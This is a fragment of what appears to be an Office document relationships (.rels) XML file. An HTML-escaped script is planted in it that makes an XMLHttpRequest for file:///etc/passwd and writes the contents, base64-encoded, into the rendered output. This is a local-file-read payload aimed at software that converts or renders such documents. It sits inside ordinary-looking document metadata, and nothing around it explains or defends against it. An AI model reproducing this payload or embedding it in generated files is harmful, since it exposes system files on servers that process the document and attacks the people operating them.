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dabc08aef46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&lt;script&gt; x=new XMLHttpRequest; x.onload=function(){document.write(btoa(this.responseText))}; x.open("GET","file:///etc/passwd");x.send(); &lt;/script&gt;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0150f2abc24577" /></Relationships>
</file>